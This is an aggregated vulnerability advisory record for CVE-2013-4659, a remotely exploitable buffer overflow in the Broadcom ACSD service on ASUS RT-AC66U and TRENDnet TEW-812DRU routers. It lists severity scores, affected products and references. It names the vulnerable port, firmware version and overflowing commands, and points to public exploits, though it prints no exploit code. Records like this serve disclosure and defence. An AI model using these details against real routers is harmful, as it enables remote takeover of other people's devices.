ID

VAR-201703-0032


CVE

CVE-2013-4659


TITLE

Buffer overflow in Broadcom ACSD, used by routers of multiple vendors including the ASUS RT-AC66U and TRENDnet TEW-812DRU

Trust: 0.8

sources: JVNDB: JVNDB-2013-006764

DESCRIPTION

Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including the ASUS RT-AC66U and the TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. Its Broadcom acsd Wireless Channel Service contains multiple buffer overflow vulnerabilities; a remote attacker can submit a malicious request to stop the device from responding or possibly execute arbitrary code. Failed exploit attempts will likely result in denial-of-service conditions. The RT-AC66U is produced by ASUS, and the TEW-812DRU is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components, and a buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU.

A public exploit for the RT-AC66U (Packet Storm 122562, Exploit-DB 27133), discovered and reported in June 2013 by Jacob Holcomb/Gimppy and Jacob Thompson, security analysts at Independent Security Evaluators, targets the acsd wireless service listening on TCP/5916 and obtains a remote root shell through the acsd autochannel&param command. It was written against firmware version 3.0.0.4.266; other versions were not tested and may be vulnerable. Its header lists the overflowing acsd commands as autochannel&param, autochannel&data and csscan&ifname.

Trust: 2.7

sources: NVD: CVE-2013-4659 // JVNDB: JVNDB-2013-006764 // CNVD: CNVD-2013-11043 // BID: 61499 // VULHUB: VHN-64661 // VULMON: CVE-2013-4659 // PACKETSTORM: 122562

IOT TAXONOMY

category: Network device, sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2013-11043

AFFECTED PRODUCTS

vendor: asus, model: rt-ac66u, scope: eq, version: -

Trust: 1.6

vendor: trendnet, model: tew-812dru, scope: eq, version: -

Trust: 1.0

vendor: asustek computer, model: rt-ac66u, scope: -, version: -

Trust: 0.8

vendor: trendnet, model: tew-812dru, scope: -, version: -

Trust: 0.8

vendor: asus, model: rt-ac66u, scope: eq, version: 3.0.0.4.266

Trust: 0.6

sources: CNVD: CNVD-2013-11043 // JVNDB: JVNDB-2013-006764 // CNNVD: CNNVD-201307-627 // NVD: CVE-2013-4659

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-4659
value: CRITICAL

Trust: 1.0

NVD: CVE-2013-4659
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2013-11043
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201307-627
value: CRITICAL

Trust: 0.6

VULHUB: VHN-64661
value: HIGH

Trust: 0.1

VULMON: CVE-2013-4659
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2013-4659
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2013-11043
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-64661
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2013-4659
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2013-11043 // VULHUB: VHN-64661 // VULMON: CVE-2013-4659 // JVNDB: JVNDB-2013-006764 // CNNVD: CNNVD-201307-627 // NVD: CVE-2013-4659

PROBLEMTYPE DATA

problemtype:CWE-119

Trust: 1.9

sources: VULHUB: VHN-64661 // JVNDB: JVNDB-2013-006764 // NVD: CVE-2013-4659

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 122562 // CNNVD: CNNVD-201307-627

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-201307-627

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-006764

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-64661 // VULMON: CVE-2013-4659

PATCH

title: Top Page, url: https://www.asus.com/jp/

Trust: 0.8

title: Top Page, url: http://www.trendnet.com/home

Trust: 0.8

sources: JVNDB: JVNDB-2013-006764

EXTERNAL IDS

db: NVD, id: CVE-2013-4659

Trust: 3.6

db: PACKETSTORM, id: 122562

Trust: 2.7

db: BID, id: 61499

Trust: 1.6

db: JVNDB, id: JVNDB-2013-006764

Trust: 0.8

db: CNNVD, id: CNNVD-201307-627

Trust: 0.7

db: CNVD, id: CNVD-2013-11043

Trust: 0.6

db: NSFOCUS, id: 24219

Trust: 0.6

db: EXPLOIT-DB, id: 27133

Trust: 0.2

db: SEEBUG, id: SSVID-80751

Trust: 0.1

db: SEEBUG, id: SSVID-80752

Trust: 0.1

db: VULHUB, id: VHN-64661

Trust: 0.1

db: VULMON, id: CVE-2013-4659

Trust: 0.1

sources: CNVD: CNVD-2013-11043 // VULHUB: VHN-64661 // VULMON: CVE-2013-4659 // BID: 61499 // JVNDB: JVNDB-2013-006764 // PACKETSTORM: 122562 // CNNVD: CNNVD-201307-627 // NVD: CVE-2013-4659

REFERENCES

url:http://www.linux-magazine.com/issues/2014/161/security-and-soho-routers

Trust: 2.6

url:https://packetstormsecurity.com/files/122562/asus-rt-ac66u-acsd-remote-root-buffer-overflow.html

Trust: 2.6

url:https://nvd.nist.gov/vuln/detail/cve-2013-4659

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4659

Trust: 0.8

url:http://1337day.com/exploit/21033

Trust: 0.6

url:http://www.securityfocus.com/bid/61499

Trust: 0.6

url:http://www.nsfocus.net/vulndb/24219

Trust: 0.6

url:https://cwe.mitre.org/data/definitions/119.html

Trust: 0.1

url:http://tools.cisco.com/security/center/viewalert.x?alertid=33445

Trust: 0.1

url:https://www.exploit-db.com/exploits/27133/

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:http://asus.com

Trust: 0.1

url:http://securityevaluators.com

Trust: 0.1

url:http://infosec42.blogspot.com/

Trust: 0.1

sources: CNVD: CNVD-2013-11043 // VULHUB: VHN-64661 // VULMON: CVE-2013-4659 // JVNDB: JVNDB-2013-006764 // PACKETSTORM: 122562 // CNNVD: CNNVD-201307-627 // NVD: CVE-2013-4659

CREDITS

Jacob Holcomb/Gimppy and Jacob Thompson

Trust: 0.9

sources: BID: 61499 // CNNVD: CNNVD-201307-627

SOURCES

db: CNVD, id: CNVD-2013-11043
db: VULHUB, id: VHN-64661
db: VULMON, id: CVE-2013-4659
db: BID, id: 61499
db: JVNDB, id: JVNDB-2013-006764
db: PACKETSTORM, id: 122562
db: CNNVD, id: CNNVD-201307-627
db: NVD, id: CVE-2013-4659

LAST UPDATE DATE

2024-11-23T22:01:14.484000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2013-11043, date: 2013-08-01T00:00:00
db: VULHUB, id: VHN-64661, date: 2017-03-15T00:00:00
db: VULMON, id: CVE-2013-4659, date: 2017-03-15T00:00:00
db: BID, id: 61499, date: 2013-07-31T12:25:00
db: JVNDB, id: JVNDB-2013-006764, date: 2017-04-05T00:00:00
db: CNNVD, id: CNNVD-201307-627, date: 2017-03-15T00:00:00
db: NVD, id: CVE-2013-4659, date: 2024-11-21T01:56:00.523

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2013-11043, date: 2013-08-01T00:00:00
db: VULHUB, id: VHN-64661, date: 2017-03-14T00:00:00
db: VULMON, id: CVE-2013-4659, date: 2017-03-14T00:00:00
db: BID, id: 61499, date: 2013-07-29T00:00:00
db: JVNDB, id: JVNDB-2013-006764, date: 2017-04-05T00:00:00
db: PACKETSTORM, id: 122562, date: 2013-07-26T20:22:22
db: CNNVD, id: CNNVD-201307-627, date: 2013-07-29T00:00:00
db: NVD, id: CVE-2013-4659, date: 2017-03-14T09:59:00.160